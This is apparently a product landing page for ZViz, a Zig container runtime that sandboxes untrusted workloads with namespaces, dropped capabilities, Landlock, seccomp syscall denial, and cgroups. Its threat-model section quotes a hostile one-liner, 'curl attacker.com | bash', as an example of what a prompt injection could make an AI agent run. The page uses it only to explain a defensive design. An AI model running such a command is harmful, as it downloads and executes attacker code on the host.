OCI runtime · Zig · Linux 5.13+

Container isolation for code you can't trust but have to run.

ZViz is an OCI-compatible Zig container runtime that takes a selective-denial approach. 132 syscalls reach the host kernel at native speed, 24 dangerous ones are denied at seccomp, and one — socket — is argument-filtered inline. No userspace kernel. No daemon.

● 41/41 capabilities dropped ● 5 namespaces per container ● single static binary ● Apache 2.0

~/zviz-bundle

$ zviz run hostile-tenant ~/bundle --verbose
[init] namespaces ............. user pid mount ipc uts
[init] capabilities ........... 41 dropped
[init] landlock ............... ruleset applied
[init] seccomp ................ BPF filter loaded
[init] cgroups v2 ............. mem + pids capped
[ready] PID 1

read(0, ...)                 ALLOW
write(1, ...)                ALLOW
clock_gettime(...)           ALLOW
socket(AF_PACKET, ...)       DENY  EPERM
ptrace(...)                  DENY  EPERM
mount(...)                   DENY  EPERM
init_module(...)             DENY  EPERM
socket(AF_INET, SOCK_STREAM) argument-filtered ok

Illustrative --verbose output — not a recorded session.

What is ZViz?

ZViz is an OCI-compatible container runtime written in Zig. It runs standard OCI bundles like runc does, but wraps the workload in a layered enforcement stack and a selective-denial syscall policy: dangerous syscalls are refused at the kernel boundary, everything else runs at native speed. It is a single static binary — no daemon, no userspace kernel.

Deny, don't emulate

Unlike a userspace kernel, ZViz doesn't reimplement the syscall ABI. Allowed syscalls hit the host kernel directly; the 24 dangerous ones simply return EPERM.

Layered by default

Five namespaces, all 41 Linux capabilities dropped, a Landlock ruleset, a seccomp-BPF filter, and cgroups v2 limits — applied in a fixed, load-bearing order.

Hostile-workload threat model

Built for the case where the code inside the container is the adversary — AI agents, code-execution platforms, CI sandboxes, and multi-tenant user code.

132 syscalls allowed at native speed

24 syscalls denied at seccomp

41 Linux capabilities dropped

Apache 2.0 open source license

Verifiable facts from the ZViz README — not benchmark claims.

You're running code you didn't write

There are three common answers to "runc is not a security boundary." ZViz picks a fourth: shrink the reachable syscall surface, keep native speed.

Plain containers expose the whole kernel

The problem

runc gives you namespaces and cgroups, but the full syscall surface is still reachable. Every runc-escape CVE is a reminder that "containerized" is not a security boundary.

ZViz's approach

ZViz drops all 41 capabilities, applies a Landlock ruleset, and loads a seccomp filter that denies the dangerous syscalls outright — a much smaller reachable surface.

ZViz vs runc →

Userspace kernels pay an emulation tax

The problem

gVisor reimplements the syscall ABI in a userspace process. That buys compatibility but routes every syscall through an extra layer, and cold starts are heavier.

ZViz's approach

ZViz does not emulate. Allowed syscalls execute on the host kernel at native speed; only the refused ones cost anything, and that cost is a rejection.

ZViz vs gVisor →

VMs are strong but heavy

The problem

A MicroVM boots a guest kernel with virtio devices. Excellent isolation, but you carry a KVM guest, a boot path, and per-instance memory overhead.

ZViz's approach

ZViz runs on bare Linux kernel primitives — no KVM guest, no virtio. You get a hardened boundary without the VM footprint, for workloads a strict syscall policy can contain.

ZViz vs Firecracker →

Untrusted code is the default now

The problem

AI agents run LLM-generated code. Code-execution platforms run user snippets. A single prompt injection is enough to make an agent run curl attacker.com | bash.

ZViz's approach

With selective denial, the dangerous syscalls a payload depends on are refused at the kernel boundary. Each container gets fresh namespaces, zero capabilities, a Landlock ruleset, and a default-deny network posture.

AI agent code execution →

Architecture

Five enforcement layers, applied in order

Ordering is load-bearing. Capabilities drop before seccomp loads. Landlock applies before seccomp so its own setup syscalls aren't self-blocked. cgroups come last, once the process boundary exists.

Namespaces

user, pid, mount, ipc, uts — resource isolation per container

Capabilities

all 41 Linux capabilities dropped — no CAP_SYS_* at all

Landlock LSM

unprivileged, kernel-enforced filesystem access control

Seccomp-BPF

selective denial: ALLOW (132) / DENY (24) / argument-filter (1)

cgroups v2

memory, PID and CPU limits — fork bombs stay contained
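
The ordering rules above can be written down as data and checked mechanically. The following is a minimal sketch, not ZViz's own code: the step labels and the ordering_violations helper are hypothetical names chosen for illustration, and the constraints are only the ones stated on this page.

```python
# Hypothetical labels for the five layers, in the order this page lists them.
LAYER_ORDER = ["namespaces", "capabilities", "landlock", "seccomp", "cgroups"]

# Each pair (a, b) means "a must be applied before b".
MUST_PRECEDE = [
    ("capabilities", "seccomp"),  # capabilities drop before seccomp loads
    ("landlock", "seccomp"),      # Landlock's setup syscalls must not be self-blocked
]


def ordering_violations(steps):
    """Return a list of human-readable problems with a proposed step order."""
    position = {name: index for index, name in enumerate(steps)}
    problems = []
    for before, after in MUST_PRECEDE:
        if before in position and after in position:
            if position[before] > position[after]:
                problems.append(f"{before} must be applied before {after}")
    # cgroups come last, once the process boundary exists.
    if "cgroups" in position and position["cgroups"] != len(steps) - 1:
        problems.append("cgroups must be applied last")
    return problems


if __name__ == "__main__":
    print(ordering_violations(LAYER_ORDER))
    print(ordering_violations(["namespaces", "capabilities", "seccomp", "landlock", "cgroups"]))
```

Keeping the constraints as pairs makes it cheap to add a rule later without rewriting the check.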

runc

App → Kernel. Namespaces + cgroups only; the full syscall surface is reachable.

gVisor

App → Sentry userspace kernel (emulates the ABI) → a small host-syscall set.

ZViz

App → BPF filter → ALLOW (132, native) / DENY (24) / filter (1).

Point it at an OCI bundle

Build once, run any standard rootfs, including one produced by docker export. The policy is small enough to read at a glance.

Build & run

# Build the static binary (Zig 0.15.0+)
$ zig build -Doptimize=ReleaseSafe

# Grab any image as an OCI rootfs (the target directory must exist first)
$ mkdir -p bundle/rootfs
$ docker create --name x redis:alpine
$ docker export x | tar -C bundle/rootfs -xf -

# Run it under the hostile-tenant policy
$ zviz run app ./bundle --profile hostile-tenant
[ready] PID 1

The policy at a glance

# Selective-denial policy, at a glance
allow  = 132 syscalls   # run on the host kernel, native speed
deny   = 24 syscalls    # return EPERM at the seccomp boundary
filter = 1 syscall      # socket(): inspected inline, per family

# denied examples
ptrace  mount  unshare  init_module  kexec_load

Requires Linux 5.13+ (Landlock) and cgroups v2. See the quickstart for the full walkthrough.
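
Both requirements can be checked before a first run. The sketch below is a hedged preflight script, not part of ZViz: the function names are hypothetical, and it assumes cgroups are mounted at the conventional /sys/fs/cgroup path. A 5.13+ kernel is necessary for Landlock but not sufficient, since the kernel must also be built and booted with Landlock enabled.

```python
import os
import re


def kernel_at_least(release, major, minor):
    """Return True if a uname-style release string is at least major.minor."""
    match = re.match(r"(\d+)\.(\d+)", release)
    if match is None:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return (int(match.group(1)), int(match.group(2))) >= (major, minor)


def has_cgroup_v2(root="/sys/fs/cgroup"):
    """A cgroup v2 (unified) mount exposes cgroup.controllers at its root."""
    return os.path.isfile(os.path.join(root, "cgroup.controllers"))


def preflight(release=None, cgroup_root="/sys/fs/cgroup"):
    """Report whether the two stated requirements look satisfied."""
    release = release or os.uname().release
    return {
        "landlock_kernel": kernel_at_least(release, 5, 13),
        "cgroups_v2": has_cgroup_v2(cgroup_root),
    }


if __name__ == "__main__":
    print(preflight())
```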

Built to contain a hostile workload

Every feature exists to shrink the reachable kernel surface or keep the allowed path fast. Nothing here is a benchmark claim — these are the mechanisms.

Isolation layers

The layered enforcement stack that contains a hostile workload

Five namespaces

A fresh user, pid, mount, ipc, and uts namespace per container. The kernel boundary is the actual isolation boundary, not a convention.
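
One way to confirm that a container really has fresh namespaces is to compare the namespace identifiers Linux exposes under /proc/<pid>/ns. This is a small sketch for inspection from the host, not something ZViz ships; the helper names are hypothetical, and reading another process's links may need matching privileges.

```python
import os

# /proc names for the five namespaces; "mnt" is the mount namespace.
NAMESPACES = ("user", "pid", "mnt", "ipc", "uts")


def parse_ns_link(link):
    """Parse a link target such as 'pid:[4026531836]' into (kind, inode)."""
    kind, _, rest = link.partition(":")
    if not (rest.startswith("[") and rest.endswith("]")):
        raise ValueError(f"unexpected namespace link: {link!r}")
    return kind, int(rest[1:-1])


def namespace_ids(pid="self"):
    """Read the namespace inode numbers for one process (Linux only)."""
    ids = {}
    for name in NAMESPACES:
        _, inode = parse_ns_link(os.readlink(f"/proc/{pid}/ns/{name}"))
        ids[name] = inode
    return ids


def shared_namespaces(first, second):
    """Names of namespaces that two processes have in common."""
    return sorted(name for name in first if first[name] == second.get(name))


if __name__ == "__main__":
    # Compare this process with itself; a container's init should share none with the host.
    print(shared_namespaces(namespace_ids(), namespace_ids()))
```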

All 41 capabilities dropped

Every Linux capability is cleared before the workload runs — no CAP_SYS_ADMIN, no CAP_NET_RAW, nothing. Capabilities drop before seccomp loads.
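
The capability sets of a running process are visible as hex bitmasks in /proc/<pid>/status, so the claim can be spot-checked from outside. The sketch below decodes those fields; it assumes capabilities are numbered 0 through 40 (41 in total), and the helper names are hypothetical. Which sets ZViz clears beyond the effective one is not stated on this page, so the check simply covers every set present.

```python
CAP_COUNT = 41                   # capability numbers 0 through 40
FULL_MASK = (1 << CAP_COUNT) - 1  # 0x1ffffffffff, every capability set

CAP_FIELDS = ("CapInh", "CapPrm", "CapEff", "CapBnd", "CapAmb")


def parse_cap_fields(status_text):
    """Extract the capability bitmasks from the text of /proc/<pid>/status."""
    fields = {}
    for line in status_text.splitlines():
        key, _, value = line.partition(":")
        if key in CAP_FIELDS:
            fields[key] = int(value.strip(), 16)
    return fields


def held_caps(mask):
    """Return the capability numbers whose bits are set in a mask."""
    return [bit for bit in range(CAP_COUNT) if mask & (1 << bit)]


def all_dropped(fields):
    """True when no capability bit is set in any of the parsed sets."""
    return all(mask & FULL_MASK == 0 for mask in fields.values())


if __name__ == "__main__":
    with open("/proc/self/status") as handle:
        print(all_dropped(parse_cap_fields(handle.read())))
```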

Landlock LSM ruleset

Unprivileged, kernel-enforced filesystem access control. Applied before seccomp so its own setup syscalls are not self-blocked. Requires Linux 5.13+.

cgroups v2 limits

Memory, PID, and CPU limits per container. Fork bombs stay contained. Applied last, once the process boundary is established.
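
On cgroups v2, these three limits correspond to the memory.max, pids.max, and cpu.max interface files of a cgroup directory. The following sketch shows the values such a setup would write; the function names and the example numbers are assumptions for illustration, and how ZViz itself chooses or applies limits is not described here.

```python
import os


def render_limits(memory_bytes, max_pids, cpu_quota_us, cpu_period_us=100_000):
    """Map limits onto cgroup v2 interface files and their string values."""
    return {
        "memory.max": str(memory_bytes),
        "pids.max": str(max_pids),
        # cpu.max takes "<quota> <period>" in microseconds.
        "cpu.max": f"{cpu_quota_us} {cpu_period_us}",
    }


def write_limits(cgroup_dir, limits):
    """Write each rendered limit into an existing cgroup directory."""
    for filename, value in limits.items():
        with open(os.path.join(cgroup_dir, filename), "w") as handle:
            handle.write(value)


if __name__ == "__main__":
    # 256 MiB of memory, 64 tasks, half of one CPU.
    print(render_limits(256 * 1024 * 1024, 64, 50_000))
```

A pids.max cap is what keeps a fork bomb contained: once the task count reaches the limit, further fork or clone calls in that cgroup fail.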

Selective-denial policy

Deny the dangerous syscalls, run the rest at native speed

Seccomp-BPF selective denial

132 syscalls reach the host kernel at native speed, 24 dangerous ones are denied at the BPF filter, and one (socket) is argument-filtered inline. Deny, do not emulate.
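
The three-way split can be modelled as a lookup. This is a toy model of the decision, not the BPF program itself: the sets below contain only the syscalls this page names, not the full 132 and 24, and the classify helper is hypothetical. The page does not say what happens to a syscall that is on neither list, so the model reports that case separately rather than guessing.

```python
ALLOW, DENY, FILTER, UNLISTED = "ALLOW", "DENY", "FILTER", "UNLISTED"

# Only the examples named on this page; the real lists are longer.
ALLOWED = {"read", "write", "clock_gettime"}
DENIED = {"ptrace", "mount", "unshare", "init_module", "kexec_load"}
FILTERED = {"socket"}


def classify(syscall):
    """Return which of the three policy branches a syscall name falls into."""
    if syscall in DENIED:
        return DENY      # returns EPERM at the seccomp boundary
    if syscall in FILTERED:
        return FILTER    # arguments are inspected before a verdict
    if syscall in ALLOWED:
        return ALLOW     # runs on the host kernel
    return UNLISTED      # behaviour not stated on this page


if __name__ == "__main__":
    for name in ("read", "ptrace", "socket"):
        print(name, classify(name))
```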

Native syscall speed

Allowed syscalls execute directly on the host kernel — ZViz does not emulate them the way a userspace kernel does. There is no per-syscall translation tax.

Argument-filtered socket

The socket syscall is inspected inline rather than blanket-denied, so policies can permit specific socket families while refusing the dangerous ones.
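
A seccomp filter sees each call as a struct seccomp_data: the syscall number, the architecture, the instruction pointer, and six 64-bit arguments, with the first argument at byte offset 16. For socket, that first argument is the address family. The sketch below packs such a record and applies a per-family verdict. The allowed set is an assumption (this page only shows AF_INET passing and AF_PACKET refused), and the syscall number and architecture constant are the x86_64 values.

```python
import struct

# struct seccomp_data { int nr; __u32 arch; __u64 instruction_pointer; __u64 args[6]; }
SECCOMP_DATA = struct.Struct("=iIQ6Q")
ARG0_OFFSET = 16  # offset of args[0] within the struct

AF_INET = 2       # Linux address family numbers
AF_PACKET = 17

ALLOWED_FAMILIES = {AF_INET}  # assumption: the real policy may permit more


def socket_verdict(raw):
    """Decide on a socket() call from the raw seccomp_data bytes."""
    (arg0,) = struct.unpack_from("=Q", raw, ARG0_OFFSET)
    family = arg0 & 0xFFFFFFFF  # the family is an int; compare the low 32 bits
    return "ALLOW" if family in ALLOWED_FAMILIES else "EPERM"


if __name__ == "__main__":
    SYS_SOCKET = 41          # x86_64 syscall number for socket
    ARCH_X86_64 = 0xC000003E  # AUDIT_ARCH_X86_64
    tcp = SECCOMP_DATA.pack(SYS_SOCKET, ARCH_X86_64, 0, AF_INET, 1, 0, 0, 0, 0)
    raw = SECCOMP_DATA.pack(SYS_SOCKET, ARCH_X86_64, 0, AF_PACKET, 3, 0, 0, 0, 0)
    print(socket_verdict(tcp), socket_verdict(raw))
```

A real filter performs the same comparison with BPF load and jump instructions inside the kernel; the Python version only mirrors the data layout and the decision.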

Runtime shape

OCI-compatible, single static binary, no daemon

OCI-compatible

Runs standard OCI bundles — including rootfs produced by docker export. No bespoke image format. Point ZViz at a config.json and a rootfs directory.
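
A rootfs from docker export does not include a config.json, so the bundle needs one written alongside it. The sketch below generates a small config using field names from the OCI runtime specification. Which fields ZViz reads or requires is an assumption here, as are the minimal_config helper, the chosen ociVersion, and the example command; a configuration that requests a user namespace will usually also need UID and GID mappings.

```python
import json


def minimal_config(args, rootfs="rootfs"):
    """Build a small OCI runtime config for a bundle directory."""
    return {
        "ociVersion": "1.0.2",
        "process": {
            "user": {"uid": 0, "gid": 0},
            "args": list(args),
            "cwd": "/",
            "env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],
        },
        "root": {"path": rootfs, "readonly": True},
        "linux": {
            # The five namespaces this page lists, using OCI type names.
            "namespaces": [
                {"type": kind} for kind in ("user", "pid", "mount", "ipc", "uts")
            ],
        },
    }


if __name__ == "__main__":
    # Redirect the output to bundle/config.json next to bundle/rootfs.
    print(json.dumps(minimal_config(["redis-server"]), indent=2))
```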

Single static binary

One statically linked Zig binary. No daemon, no supervisor process, no userspace kernel. zviz run uses exec to replace itself with the workload, which then runs as PID 1.

Honest about what it is — and isn't

ZViz is one specific bet. Here's the shape of it, and where another tool is the right call.

What ZViz is

An OCI-compatible container runtime written in Zig
A selective-denial syscall policy: 132 allow / 24 deny / 1 filter
A layered stack: namespaces, 41 caps dropped, Landlock, seccomp, cgroups v2
A single static binary — no daemon, no supervisor

What ZViz is not

Not a userspace kernel like gVisor

Allowed syscalls run on the host kernel natively; ZViz does not emulate the ABI.
Not a MicroVM like Firecracker

There is no KVM guest, no virtio devices, no boot path — bare kernel primitives.
Not a drop-in runc replacement for every workload

If you need ptrace, mount, or unshare inside the container, use gVisor instead.

Read the full threat model →

Explore the docs

Everything about ZViz — the enforcement mechanisms, where it fits, how it compares, and how to run it.

Run untrusted code with a smaller attack surface

ZViz is open source under Apache 2.0. Build the static binary, point it at any OCI bundle, and pick a profile — or write your own selective-denial policy.
